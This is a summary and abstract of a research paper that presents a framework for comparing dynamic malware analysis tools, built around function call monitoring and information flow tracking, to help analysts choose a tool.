A Framework for Analysis and Comparison of Dynamic Malware Analysis Tools

TL;DR

This paper introduces a comparison framework for dynamic malware analysis tools, focusing on function call monitoring and information flow tracking, to help researchers select the most suitable tools for analyzing malicious code behavior.

Contribution

It provides a structured framework to evaluate and compare dynamic malware analysis tools based on their implementation, approach, and system support.

Findings

Framework aids in tool selection for malware analysis

Highlights differences in analysis strategies

Supports effective malware investigation

Abstract

Malware writers have employed various obfuscation and polymorphism techniques to thwart static analysis approaches and bypassing antivirus tools. Dynamic analysis techniques, however, have essentially overcome these deceits by observing the actual behaviour of the code execution. In this regard, various methods, techniques and tools have been proposed. However, because of the diverse concepts and strategies used in the implementation of these methods and tools, security researchers and malware analysts find it difficult to select the required optimum tool to investigate the behaviour of a malware and to contain the associated risk for their study. Focusing on two dynamic analysis techniques: Function Call monitoring and Information Flow Tracking, this paper presents a comparison framework for dynamic malware analysis tools. The framework will assist the researchers and analysts to recognize the tools implementation strategy, analysis approach, system wide analysis support and its overall handling of binaries, helping them to select a suitable and effective one for their study and analysis.